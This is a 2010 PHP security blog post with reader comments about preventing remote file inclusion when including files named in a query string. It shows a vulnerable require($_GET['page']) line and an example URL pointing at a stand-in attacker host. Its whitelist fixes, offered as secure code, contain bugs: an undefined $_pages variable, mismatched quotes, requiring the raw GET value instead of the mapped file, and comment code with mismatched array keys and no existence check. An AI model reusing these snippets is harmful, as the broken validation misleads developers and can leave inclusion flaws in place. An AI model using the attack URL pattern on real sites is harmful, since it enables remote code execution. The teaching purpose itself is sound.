Including a Filename from User Input

24 06 2010

Why? Why would anyone in their right mind do such a thing you may well wonder. Yes, allowing this sort of thing carries serious risks such as remote file inclusion and cross-site scripting. So, must we break the rule of “never trusting user input” and go ahead and use that input? Without filtering that input, such an action would be foolhardy. So, let’s consider how we might go about filtering the user’s input.

In PHP, if we wish to prevent remote file inclusion, you need to make certain that you know what data your script should expect. If you have a script that uses a value from a GET variable, for example one from a query string which a malicious user could easily alter, then you need to be sure that someone else’s evil code is nonetheless unable to run on your site.

For example, if your script has a url like the following appearing in the location area of the browser,

http://www.example.com/my_best_stuff.php?page=cool

There is nothing to prevent an evil hacker from tampering with the url and changing it to something like the following:

http://www.example.com/my_best_stuff.php?page=http://www.bad.com/do_bad_things.php

If your code were to trust the GET variable implicitly and use it

require($_GET['page']);

then someone else’s malicious code would be faithfully executed by your web server.

Both the webserver admin and the programmer can both work to make sure the code runs without security breaches. The admin needs to know which version of PHP is running and then change the PHP.ini file as follows:

PHP version previous to 5.2: disable allow_url_fopen by setting it to Off
PHP5.2 or greater disable allow_url_include by setting it to Off

And, it is even possible to alter the above settings in the Apache’s httpd.conf which would make sense if you were running PHP as an Apache module.

But what about the programmer? What should he or she do? Filter the data! There are two ways one can do this: blacklisting and whitelisting. Blacklisting basically addresses what is not allowed while whitelisting limits what is allowed to a specific set of values.

Let’s look at the merits of both:

Here’s an example of blacklisting:

if ($_GET['page'] == 'http://www.bad.com/do_bad_things.php') {
exit("Oh, no you don't!");
}

So, we’ve eliminated the possibility of one bad script running on our server. Yet, we have left the door wide open for other bad scripts to wreak their havoc.

Whitelisting is the more restrictive approach because it matches up user input with the data that we know is acceptable, as follows:


$pages = array( "today" => "today_top_stories.php",
"tomorrow" => "predictions.php",
'yesterday" => "old_news.php");
if (isset($_pages[ $_GET['page'] ] ) ) {
require( $_GET['page'] );
}

So, a GET variable with any value other than today, tomorrow, or yesterday is impermissible. Since the GET variable is being used as a key for the associative array $pages, this is a feasible solution. In fact, this sort of style is even suggested by security expert Ilia Alshanetsky (see: http://ilia.ws/files/phptek2007_secpitfalls.pdf).

You could also use the following code, too:


$pages = array( "today" => "today_top_stories.php",
"tomorrow" => "predictions.php",
"yesterday" => "old_news.php"
);
if (in_array( $_GET['page'], array_keys($pages) ) ) {
require( $_GET['page'] );
}

This approach has the advantage of being more explicit than the previous example, although both work well as whitelisting examples and both do validate user input against an array key.

So, is that it? Shall we neatly wrap this up in a bow and say tra-la?

We could probably improve the architecture, so let’s do just that . User input comes to a PHP script as text, in other words as string values. When possible it is preferable to work with numbers because they are faster. So, let’s do some refactoring aka editing as follows:

$pages = array( 12 => "today_top_stories.php",
22 => "predictions.php",
63 => "old_news.php"
);
$clean['page'] = (int) $_GET['page'];
if (in_array( $clean['page'], array_keys($pages) ) ) {
require( $pages [ $clean['page'] ] );
}

We could also use PHP’s filter extension, as follows:

$pages = array( 12 => "today_top_stories.php",
22 => "predictions.php",
63 => "old_news.php"
);
if ( filter_var( $_GET['page'], FILTER_VALIDATE_INT )) {
$clean['page'] = $_GET['page'];
if (in_array( $clean['page'], array_keys($pages) ) ) {
require( $pages [ $clean['page'] ] );
}
}

Note that in both examples above, the script only touches the GET variable after we’ve done some initial filtering. In the first case we cast the GET variable to an int value. If the user entered a string for example, what do you think would happen? Try it! Casting a string in PHP to an int may not work the way you might expect. In the second example, the filter_var() does the int filtering for us with its FILTER_VALIDATE_INT constant.

Both scripts check to see if the int value is among the array keys and if so, then the corresponding page will be included unless something goes wrong. Hmm, what could go wrong?

Suppose the file today_top_stories.php was accidentally deleted by a web admin or a developer. The code above is good but certainly not full-proof. In this case if you use PHP’s include(), an E_WARNING will be emitted and the script will continue to execute without including the requested file. But, if you use require(), the result will produce an E_ERROR, i.e. a fatal error will occur and the script will immediately stop executing.

What can you do?? There’s another approach which would be to go through the directory of include files and create a $pages variable whose elements corresponding to the files in the directory. We can assign a unique id to each element in $pages by using md5(), passing in the entire filename, including its path, as a parameter. Then we can compare a GET variable, presumably containing an md5()’ed filename to each element in $pages, as follows:


$pages = array();
foreach ( glob('./pages/*') as $p ) {
$pages[ md5($p) ] = $p;
}
$clean = array();
if ( ctype_alnum( $_GET['page'] ) ) {
$clean['page'] = $_GET['page'];
if (in_array( $clean['page'], array_keys($pages) ) ) {
require( $pages[ $clean['page'] ] );
}
}

So, suppose we have a url such as the following:

http://localhost/exp/whitelist2.php?page=8b20e3600f94875e70afb95411978a48

If a user were to tamper with the query string above, the worse that would happen is that the page would not be included and the script would proceed without generating any disruptive warning or fatal error messages. On the other hand, if the query string remains intact, then the PHP script would use it to include the page if it exists in $pages.

Probably the most important lesson to be learned here is more than the simple mantra of “never trust user input.” Input can come from a user or has the potential of being altered by a user, so anything from what a user provides to what a user has the ability to alter, should be seen as suspect. There are a variety of validation techniques available. You need to consider more than just the question of “how-to”. Also, important are the possible ramifications of adopting one technique over another. Performance is important but having code that can be easily maintained is a surer sign of a well-engineered application.

This work is licensed under a Creative Commons License
.

Advertisements

Actions

Information

6 responses

25 06 2010
Chuck

I am a bit confused. I do not understand the benefit of the improvements you suggest to the original white list code.

First is to cast to an integer. Is this really going to make a significant difference in execution time that is worth the loss of code readability. The next time a modification is needed the developer will have to figure out what each integer value means. I would prefer to stick with today, tomorrow, and yesterday rather than 12, 22, and 63.

Second, if a web developer removes a required file isn’t it better to get the error indicating a fix is needed rather than to add code to hide it. Although if I did want to catch it I would probably just call file_exists() as a condition to including the file.

Lastly the md5 example just makes me ask why? Working with this md5 string of characters sacrifices both readability and any performance improvement that the integer example would have. In addition each time this code runs it is going to execute a file search and loop through an array. I do not understand the situation where this code would be needed.

26 06 2010
Sharon Lee Levy

Chuck, thanks for your patience. Okay now to address your remarks.

Confusion is fine, sometimes when people get creative, things can get messy and confusion may result. So, let’s see what I can do to clarify.

I assume when you refer to cast to an integer you are not referring to the specific code line where I do precisely that but you are wondering why did I move from using strings in an associative array to using an array with numerical indices. I recall a job interview I had some years ago where the interviewer asked me what I would do if the user tampered with the query screen and how would I make certain that such tampering would be rendered harmless. Well, having GET variables that are numerical is an easy way to handle things. So, if the user changed the query string so that ?page=tadah appeared instead of ?page=11, by writing:

(int) $_GET[‘page’]

I’d always be assured of having a number to deal with. My code would show what is a numerically acceptable range and take appropriate action if the number was outside of it.

Your second point. There are times when you may want the code to fail gracefully, and tell the user that the requested file is unavailable. There may be times when instead you may want to display a default file. So “better” is of relative value here.

The md5 example is based upon some code that I saw in the online presentation of Ilia Alshanetsky (see: phptek2007: security pitfalls). I realized that if I add or subtract files from a directory, then if I read the files into an array the index of any particular file is subject to change. In order to keep, the index the same, I needed a unique index value. By md5ing the file’s entire name, I definitely came up with a unique index, so now each file’s index is unique and constant whether any files are additionally added or deleted from the index. Yes, I could have used the page names as indexes, but I like the idea of being able to easily spot which is the value, ie page name and which is the key ie the md5 hash of the page name.

25 06 2010
William Estrada

Great article on security input and coding regarding file inclusion.

Just a comment …Could possibly also use filter_input vs filter_var eliminating some lines. Can use isset vs in_array. There is slight performance gain not using in_array since not going through each key but sure very neglible gain for only 3 keys — more gain if you have 1000’s of keys to search through.

$clean[‘page_key’] = filter_input(INPUT_GET, ‘page’, FILTER_VALIDATE_INT);
// either returns false or the value of the get variable if filter passes

if ( $clean[‘page’] != false && isset( $pages [ $clean[‘page_key’] ] ) ) {
require ( $pages [ $clean[‘page_key`’] ] );
}

26 06 2010
Sharon Lee Levy

William, thank you, glad you liked the article. I also found your comments interesting. I agree that you can use isset() or in_array() as I demonstrated in the article. Your point about performance is duly noted. However, maintenance is also an important issue. It’s important to aim for code that is fast and that can be easily understood and maintained by others.

In terms of going through 1000’s of keys, it’s also preferable to avoid associative arrays and strings as indexed arrays and numbers will always be faster.

The online PHP documentation indicates that filter_var’s entire purpose is to filter a variable. On the other hand, filter_input gets a specified user input and will optionally filter it. So, while I have seen code that takes the shortcut of using filter_var to filter a user’s input, it seems more sensible to use filter_input(). So, I’m glad that you raised this issue.

I like the way you used isset() in the example you provide, however, filter_has_var() may be faster (see: first note at: http://us3.php.net/manual/en/function.filter-has-var.php So, to get actual user input and filter it, we could do this:


if ( filter_has_var( INPUT_GET, 'page' ) ) {
$clean['page'] = filter_input(INPUT_GET, 'page', FILTER_VALIDATE_INT );
if ( $clean['page'] ) {
require( $pages [ $clean['page'] ] );
}
}

The only thing to watch out for is that you’re using a version of PHP in which previous filter extension bugs have been fixed.

Now, to fake a GET which we developers are prone to do, depending on circumstances, we might do something like this:


$_GET['page'] = 99;
$clean['page'] = filter_var($_GET['page'], FILTER_VALIDATE_INT );
if ( $clean['page'] ) {
require( $pages [ $clean['page'] ] );
}

16 07 2010
Aaron Hawley

There aren’t enough exhaustive tutorials that cover all the parts and pieces to explain how to write secure Web applications. Great article.

16 07 2010
Sharon Lee Levy

Aaron, thank you! I’m glad you enjoyed reading my article.

— Sharon

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




%d bloggers like this: